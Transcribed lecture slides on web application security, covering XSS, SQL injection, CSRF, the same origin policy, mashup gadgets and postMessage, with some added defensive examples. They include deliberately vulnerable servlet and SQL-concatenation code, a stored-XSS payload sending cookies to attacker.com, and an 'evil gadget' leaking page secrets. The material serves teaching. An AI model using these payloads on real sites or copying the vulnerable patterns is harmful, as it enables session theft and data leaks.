Web Programming and Security Lecture 2 Tamara Rezk


Page 1: Web Programming and Security Lecture 2 Tamara Rezk

Web Programming and Security

Lecture 2

Tamara Rezk

Page 2

Security problems

Confidentiality violation

Integrity violation

Availability violation

Pages 3 to 5

Attacks, summary

• Phishing attacks (eg MySpace, 2006)

• Session integrity attacks (eg Dansie shopping cart, 2006)

• Cross site request forgery attacks (eg Gmail, 2007)

Page 6

Prevention

• Server side:

– add a secret that the attacker cannot guess

– re-authenticate for critical operations

• User side:

– logging off one site before using others

Pages 7 and 8

Attacks, summary

• Phishing attacks (eg MySpace, 2006)

• Session integrity attacks (eg Dansie shopping cart, 2006)

• Cross site request forgery attacks (eg Gmail, 2007)

• Navigation policy based attacks (eg Guninski/Citibank, 1999)

Attacks, classification?

Page 9

Lessons Learned

Do not trust the client on:

• Maintaining integrity of session state

• Running client code

• Providing valid input

Page 10

Lessons Learned

Do not trust the client on:

Providing valid input

    import java.io.IOException;
    import java.io.PrintWriter;
    import javax.servlet.ServletException;
    import javax.servlet.http.HttpServlet;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;

    public class Greeting extends HttpServlet {
        public void doGet(HttpServletRequest req, HttpServletResponse res)
                throws ServletException, IOException {
            res.setContentType("text/html");
            PrintWriter out = res.getWriter();
            // Untrusted: taken straight from the query string
            String name = req.getParameter("name");
            out.println("<HTML>\n<BODY>\n");
            // The parameter is echoed into the page without escaping (the point of this slide)
            out.println("Greeting from " + name + "\n");
            out.println("</BODY>\n</HTML>\n");
        }
    }

Page 11

Lessons Learned

Do not trust the client

http://host/Greeting?name=<script> …</script>

Page 12

Security in Web Applications

Main source of vulnerabilities

From Cenzic Web Security Trends Report Q1-Q2-2010

• Cross-site scripting

• Information leakage

• SQL Injection

The multitier nature causes problems

Page 13

Code injection

• Data-tier code injection (SQL)

• Client-tier code injection (Javascript)

• Server-tier code injection

Page 14

SQL Injection

    Query = "SELECT score FROM Student where name = '" + input

Page 15

SQL Code Injection Attack, Microsoft 2008

Page 16

CardSystems out of business, 2005 (SQL Code injection attack)

263000 numbers stolen!

Page 17

Dynamic Code Generation

s (i1, …, in) c

s: server program

i1, …, in: untrusted input (provided by client)

c: client code, an HTML document with Javascript nodes

let's see a guestbook example

Page 18

Attack to the guestbook

    <script> alert("attack!");</script>

Page 19

Embedding Javascript

Three ways, all inside <body> … </body>:

• External Javascript file:

    <script type="text/javascript" src="myCode.js"></script>

• Inline code:

    <script type="text/javascript"> //<![CDATA[ alert("Page is loading"); //]]> </script>

• Event handler:

    <p onclick="alert('I told you not to click on me!');"> Please do not click on this text.</p>

Page 20

Let’s see some other ways to inject code

Page 21

Code Injection, other example

• Untrusted client input:

    <script>window.location = "http://attacker.com?cookie=" + document.cookie; </script>

• Goal: inject the code to a benign user;

• Consequence:

– Cookie stolen by attacker.com;

– Possible sensitive private information;

Page 22

Code Injection & XSS - Example

Diagram: the malicious user adds a guestbook entry containing

    <script>window.location = "http://attacker.com?cookie=" + document.cookie; </script>

and the guestbook server stores it in the database. When a benign user gets all entries, the stored script runs in the benign user's browser and sends the secret cookies to attacker.com.

Page 23

Existing Server-side Prevention

• Escaping / Filtering: vulnerable code is turned into patched code. Programmer attention required!! Example: preg_replace("script", "", input) turns "<scrscriptipt>" into "<script>".

• Taint Analysis: WebSSARI, Huang et al. [2004]; Pixy, Jovanovic et al. [2006]; Xie and Aiken [2006]; …

• String Analysis: Minamide [2005]; Balzarotti [2008]; Wassermann et al. [2008]; …

• Instruction Randomization: vulnerable code is turned into randomized code before release. Boyd et al. [2004]
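As an added example (not code from the lecture), the preg_replace filter from this slide and the guestbook attack entry from page 18 are run through a single-pass blacklist, a repeated blacklist and plain HTML escaping; the function names are mine.

```javascript
// Added example, not from the lecture. Compares the slide's blacklist filter
// (remove the substring "script") with output escaping, which does not depend
// on guessing every encoding an attacker may use.

// The filter from the slide: preg_replace("script", "", input), applied once.
function naiveFilter(input) {
  return input.replace(/script/g, "");
}

// A "stronger" filter that repeats until nothing changes. It closes the
// nesting trick on the slide but still only knows one tag name, so it is
// still a blacklist and still needs programmer attention for every new vector.
function repeatedFilter(input) {
  let prev;
  do { prev = input; input = input.replace(/script/g, ""); } while (input !== prev);
  return input;
}

// Escaping: the five characters that can open markup or break out of an
// attribute become entities, so whatever the client sent is rendered as text.
function escapeHtml(input) {
  return input.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Constructed inputs: the bypass shown on this slide and the page-18 entry.
const nested = "<scrscriptipt>";
const guestbookEntry = '<script> alert("attack!");</script>';
```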

Page 24

HTML parser and browser quirks

• Standard HTML Parser

– Obtain target syntax tree

– No ill-formed result produced

• Various ways of triggering the JS engine (BEEP [Jim et al. 2007]):

– Event listener: (<DIV> :onclick "alert(msg)")

– Hyperlink: (<A> :href "javascript:alert(msg)")

– Dynamic code evaluation: eval, document.write

NOT identified by syntax difference

• Solution: turning off all these features in Hop

– Advantage of multitier language

Page 25

Code Injection Attack vectors

Page 26

Page 27

Web 2.0 Applications

2004: AJAX (Asynchronous Javascript and XML) becomes popular, social sites emerge

Technologies: Web Browser, Web Server, HTTP, HTML

CGI: Common Gateway Interface

AJAX: Javascript, CSS, XML, DOM, XMLHttpRequest

• request a service

• partial reloading of the webpage (iframe)

• XMLHttpRequest object for asynchronous communication

Page 28

Mashups: HousingMaps, 2005

Page 29

Web Mashup

• Web application (client side):

• Integrating third-party gadget;

• Integrator partially sharing information to gadget;

• Example: Housingmap.com

Diagram: a Google Maps gadget combined with the integrator's housing data. "Great way to use your data!"

Page 30

Le Monde is a mashup

Page 31

Code of Le Monde

    <iframe src="http://www.youtube.com/embed/W8WP2SjsZw4?rel=0" width="520" height="294" frameborder="0"></iframe>

Page 32

ALL OR NOTHING TRUST MODEL IN THE BROWSER

The Same Origin Policy

Page 33

Programming Model – Dilemma

• Using the <script> tag:

– Full sharing (JS Env.)

– Running as integrator

– Gadget trusted

• Using an <iframe> frame:

– Full isolation (by SOP)

– Running as gadget

– Limited sharing: frame identifier, postMessage

Diagram: the Google Maps gadget and the integrator's housing data in each configuration; in the <iframe> case the sharing is marked as blocked.

Page 34

The same origin policy (SOP)

• The <iframe> tag: what about Javascript behaviour?

Diagram: in the browser, the integrator's code contains <iframe src="http://b.com/gadget.js"> … </iframe>; in the heap, the integrator and the gadget each get their own global object.

Page 35

The same origin policy (SOP)

• The <script> tag treats the included code as code from the same origin

Diagram: the browser runs the integrator's code, which contains <script src="http://b.com/gadget.js">; the integrator's page comes from server a.com and the gadget script from server b.com.

Page 36

The same origin policy (SOP)

• The <script> tag: what about Javascript behaviour?

Diagram: in the browser, the integrator's code contains <script src="http://b.com/gadget.js">.

Page 37

The same origin policy (SOP)

Page 38

An evil gadget

integrator.html:

    <script src="http://attacker.com/gadget.js"></script>
    <div id=secret>42</div>

gadget.js:

    secret = document.getElementById("secret").innerHTML;
    setTimeout('delayer()', 5000);
    delayer = function () { window.location = "EvilSite.php?secret=" + secret; };

Page 39

Important JavaScript detail:

o.f is treated as o["f"]

Javascript

Thanks Shriram Krishnamurthi for this slide

Page 40

    lookup = function(o, fd) {
        if (fd === "XHR") { return "unsafe!"; }
        else { return o[fd]; }
    }

If fd is not a string, JavaScript invokes the .toString method to convert the value to a string

Is this function safe?

Page 41

    badObj = {toString: function () {return "XHR"}}

    lookup(window, badObj)
    window[badObj]
    window[{toString: …}]
    window[{toS…: …}.toS…()]
    window[(function () …)()]
    window["XHR"]

…in fact, lookup is unsafe!
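As an added example (not code from the lecture), the lookup wrapper and badObj from these two slides next to two hardened wrappers; target is a constructed stand-in for window, "XHR" is the property the wrapper is supposed to hide, and the function names other than lookup are mine.

```javascript
// Added example, not from the lecture. Re-creates the slide's lookup() and
// badObj, then shows wrappers that do not fall to the implicit toString call.
const target = { XHR: "hidden capability", safe: "public value" };  // stand-in for window

// The wrapper as written on the slide.
const lookup = function (o, fd) {
  if (fd === "XHR") { return "unsafe!"; }
  else { return o[fd]; }
};

// The slide's attacker key: not === "XHR", but coerces to "XHR" inside o[fd].
const badObj = { toString: function () { return "XHR"; } };

// Hardened wrapper 1: accept only primitive strings, so the comparison and the
// property access see the same value and no caller-supplied code runs.
function lookupStrict(o, fd) {
  if (typeof fd !== "string") { return "unsafe!"; }
  if (fd === "XHR") { return "unsafe!"; }
  return o[fd];
}

// Hardened wrapper 2: coerce exactly once and reuse the result. Coercing twice
// (once for the check, once for the access) would let a toString that answers
// differently on each call pass the check and still reach o["XHR"].
function lookupCoerceOnce(o, fd) {
  const key = String(fd);
  if (key === "XHR") { return "unsafe!"; }
  return o[key];
}

// Constructed flip-flop key: "safe" the first time it is converted, "XHR" after.
function makeFlipObj() {
  let calls = 0;
  return { toString: function () { return calls++ === 0 ? "safe" : "XHR"; } };
}

// The tempting fix that coerces twice, kept to show why "once" matters.
function lookupCoerceTwice(o, fd) {
  if (String(fd) === "XHR") { return "unsafe!"; }
  return o[fd];   // second conversion: the flip-flop key now says "XHR"
}
```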

Page 42

More evals: e.g., setTimeout:

    function f() { alert('hello'); }
    setTimeout(f, 1000);

    var s = "alert('hello') ";
    setTimeout(s, 1000);

Any JavaScript string!

Page 43

Let’s try some more code with setTimeout

Page 44

    <script>
    s = "alert('Lets talk about Javascript!')";
    setTimeout(s, 100)
    </script>

Page 45

    <script>
    function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); }
    r = fac(3);
    s = "alert(" + r + ")";
    setTimeout(s, 100)
    </script>

Page 46

What happens now?

    <script src=attacker.js></script>
    </head>
    <body>
    <script>
    function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1); }
    r = fac(4);
    s = "alert(" + r + ")";
    setTimeout(s, 100)
    </script>

Page 47

Anything Else?

• Wrap DOM nodes and callbacks

• Don't hand references to DOM nodes to the wrong functions

• Avoid other conditionally unsafe calls

• Be aware of implicit method calls in JavaScript's semantics

• Simulate private fields (JavaScript provides none)

• Disallow arbitrary traversal of the object graph

• Avoid leaking the global object

Make sure all invariants hold over 50+ entry points

Thank you Shriram Krishnamurthi for all the recommendations! Check AdSafety

Page 48

The same origin policy (SOP)

• The <iframe> tag: what about Javascript behaviour?

(Diagram repeated from page 34: the integrator and the gadget frame each get their own global object in the heap.)

Page 49

Frame Communication

Page 50

Fragment Identifier Messaging

• Send information by navigating a frame

– http://gadget.com/#hello

• Navigating to a fragment doesn't reload the frame

– No network traffic, but the frame can read its fragment

• Not a secure channel

– Confidentiality

– Integrity

– Authentication

Pages 51 and 52

An attack to the Elysee?

http://www.elysee.fr/president/accueil.1.html?id=1327062581707&msg=Sotp%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB

http://www.elysee.fr/president/accueil.1.html?id=1327077505069&msg=Anonymous

http://www.elysee.fr/president/accueil.1.html?id=1327077699951&msg=We%20Are%20Legion!

Let's see a video

Page 53

HTML 5

• Cross-origin client side communications

• Postmessage channel between frames

• Child policy

Page 54

postMessage

• New API for inter-frame communication

• Supported in latest betas of many browsers

• Not a secure channel

– Confidentiality

– Integrity

– Authentication

Page 55

Reply Attack

Page 56

Fix: Improve the API (Stanford)

• Let the sender specify the recipient

– frames[0].postMessage("Hello", "http://gadget.com")

– Can omit the argument if confidentiality is not required

• Adoption

– Firefox 3

– Internet Explorer 8

– Safari 3.1

see Securing Frame Communication in Browsers

Page 57

Security considerations: postMessage

• Do not configure target origin to “*”

• Sensitive data can be leaked to unknown widgets

• Always check for sender’s origin

• Always validate data before use

• Do not consume data directly with eval() or innerHTML
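As an added example (not code from the lecture), a receiver and a sender that follow the five rules on this slide. The origins, the JSON message format and the function names are my own assumptions; the render callback stands in for writing to the page through textContent.

```javascript
// Added example, not from the lecture. The two origins below are assumed.
const INTEGRATOR_ORIGIN = "https://integrator.example";   // assumed trusted sender
const GADGET_ORIGIN = "https://gadget.example";           // assumed gadget origin

// "Always validate data before use": parse as JSON and accept only a known
// command with a bounded string argument. The raw string is never executed.
function validateMessage(data) {
  if (typeof data !== "string") { return null; }
  let msg;
  try { msg = JSON.parse(data); } catch (e) { return null; }
  if (msg === null || typeof msg !== "object") { return null; }
  if (msg.cmd === "reset") { return { cmd: "reset", arg: "" }; }
  if (msg.cmd === "setQuery" && typeof msg.arg === "string" && msg.arg.length <= 64) {
    return { cmd: "setQuery", arg: msg.arg };
  }
  return null;
}

// "Always check for sender's origin" first, then validate, then render as text
// (never eval() or innerHTML). Returns a record of the decision so the logic
// can be checked without a DOM.
function handleMessage(event, render) {
  if (event.origin !== INTEGRATOR_ORIGIN) { return { accepted: false, reason: "origin" }; }
  const msg = validateMessage(event.data);
  if (msg === null) { return { accepted: false, reason: "malformed" }; }
  render(msg.arg);   // textContent-style sink: markup inside arg stays inert text
  return { accepted: true, cmd: msg.cmd };
}

// "Do not configure target origin to '*'": name the recipient origin, so a
// frame that has since been navigated elsewhere cannot read the message.
function sendToGadget(frameWindow, payload) {
  frameWindow.postMessage(JSON.stringify(payload), GADGET_ORIGIN);
}

// Constructed events, shaped like the ones a "message" listener receives.
function demo() {
  const rendered = [];
  const render = (text) => rendered.push(text);
  const results = [
    handleMessage({ origin: "https://attacker.example", data: '{"cmd":"reset"}' }, render),
    handleMessage({ origin: INTEGRATOR_ORIGIN, data: "alert(1)" }, render),
    handleMessage({ origin: INTEGRATOR_ORIGIN, data: '{"cmd":"setQuery","arg":"<b>x</b>"}' }, render),
  ];
  return { results, rendered };
}
```

In a page the receiver is wired as window.addEventListener("message", (e) => handleMessage(e, (t) => { outputNode.textContent = t; })).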

Page 58

Basic definitions of security

Confidential information is stored in, or communicated through "objects" protected by access rights, typically for reading, writing, and executing.

• Confidentiality: to prevent unauthorized disclosure of data we should implement:

– access control

– secure information flow

– adequate cryptography

– secure protocols

(to name a few)

Page 59

Access Control

“Subjects” = programs (threads) or users, with security clearances (read/write/execute).

“Objects” = where information is stored. For instance memory locations, files, entries in a database, services, communication channels … with access rights.

Access control = the operations performed by the “subjects” over the “objects” are checked to have the appropriate clearance.

Page 60

Access Control (for integrity)

A simple example in hop: A Guest Book Application

Objects = "services"

Subjects = "users calling the services" (authentication)

Access Policy = "which user can call which service"

    Services                      Users
    addentry                      anonymous
    addentry, delete-all-entries  admin

Page 61

Access Control (for confidentiality)

A simple example in hop: A Broker Application

Objects = “services” showStockInfo

Subjects = “users calling the services” (authentication)

Access Policy = “No user should learn anything about stocks of other users” (each user can see only his/her confidential information on stocks)

Page 62

Access control

• In Hop: wizard.hop

Page 63

AUTHENTICATION PROTOCOLS

Http authentication is not really secure!!

Let's play attacker again on an example with "Tamper Data" and a Base64 Decoder to obtain the password of the admin user.

Page 64

SSL/TLS AUTHENTICATION

Page 65

INFORMATION FLOW IN THE PROGRAM

Page 66

Broker Application

    (define (isUser t a) (string=? t (car a)))

    (define-service (show-all-entry)
      … (map show-entry (filter (lambda (a) (isUser username a)) broker-private-information)))

    (define-service (broker)
      (<HTML> (<BODY> … (<BUTTON> :onclick ~(with-hop ($show-all-entry) …) "Share holder login") …)))

Page 67

Broker Application

    (define (isUser1 t a) (string-contains t (car a)))

    (define-service (show-all-entry)
      … (map show-entry (filter (lambda (a) (isUser1 username a)) broker-private-information)))

    (define-service (broker)
      (<HTML> (<BODY> … (<BUTTON> :onclick ~(with-hop ($show-all-entry) …) "Share holder login") …)))
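As an added example (not the lecture's Hop code), the two ownership tests from pages 66 and 67 re-created in JavaScript over constructed holdings: exact equality plays the role of string=?, substring search the role of string-contains, and the substring version lets a user whose name contains another user's name read that user's entries. The holdings and function names other than isUser and isUser1 are my own.

```javascript
// Added example, not from the lecture. Constructed broker-private-information:
// each entry is [owner, holding], as (car a) / (cdr a) in the Hop code.
const brokerPrivateInformation = [
  ["ann",   "ACME 120 shares"],
  ["joann", "GLOBEX 40 shares"],
  ["bob",   "INITECH 75 shares"],
];

// Page 66: (string=? t (car a)), the entry is shown only on an exact match.
function isUser(t, a) { return t === a[0]; }

// Page 67: (string-contains t (car a)), true whenever the entry's owner name
// occurs anywhere inside the logged-in user's name. "joann" contains "ann".
function isUser1(t, a) { return t.includes(a[0]); }

// show-all-entry: filter the private table with the chosen ownership test and
// return the holdings that would be rendered for this user.
function showAllEntries(username, ownershipTest) {
  return brokerPrivateInformation
    .filter((a) => ownershipTest(username, a))
    .map((a) => a[1]);
}
```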

Pages 68 to 70

Availability security problems

• A service or resource is made unavailable

Common attack: DOS or Distributed DOS (DDOS)

How to prevent it?

Page 71

Availability security problems

Page 72

Attacks, summary

• Phishing attacks (eg MySpace, 2006)

• Session integrity attacks (eg Dansie shopping cart, 2006)

• Cross site request forgery attacks (eg Gmail, 2007)

• Navigation policy based attacks (eg Guninski/Citibank, 1999)

• Code injection attacks (eg Microsoft, 2008)

• XSS attacks

• Mashup based attacks

• http authentication attacks

• DOS attacks (Captchas)

Page 73

Context – Multi-tier Language

• Unified Language

• Code split to different tiers

• Example:

– LINKS [Cooper et al. 2005]

– Swift [Chong et al. 2007]

– Ur [Chlipala 2010]

– HOP [Serrano et al. 2006]

• This course focus: HOP

Diagram: Multi-tier compiler

Page 74

Hop compilation

Diagram: the multi-tier compiler (Mashic compiler) splits a Hop program into server code and client code. The server code compiler produces server bytecode, which is invoked over HTTP through access URLs and generates the client side; the client code compiler produces HTML, CSS and JS. A code injection prevention step is part of the pipeline.

Page 75